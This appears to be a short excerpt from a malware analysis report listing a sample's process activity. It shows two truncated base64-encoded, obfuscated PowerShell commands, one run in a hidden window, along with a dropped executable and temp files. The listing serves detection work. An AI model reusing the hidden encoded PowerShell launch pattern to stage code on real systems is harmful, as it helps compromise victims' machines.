Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABzAG8AUQBBAEMAbwBBAEEAPQAoACgAJwBqACcAKwAnADEAQwAnACkAKwAnAFgAJwArACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBHADEAJwAsACcAQQBBACcAKQApADsAJABoAEEAMQBRAFEAQwBRAEIAIAA9ACAAKAAnADgAMgAnACsAJwA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1540
- %TEMP%\1177152.cvr
- %HOMEPATH%\820.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABzAG8AUQBBAEMAbwBBAEEAPQAoACgAJwBqACcAKwAnADEAQwAnACkAKwAnAFgAJwArACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBHADEAJwAsACcAQQBBACcAKQApADsAJABoAEEAMQBRAFEAQwBRAEIAIAA9ACAAKAAnADgAMgAnACsAJwA...' (with hidden window)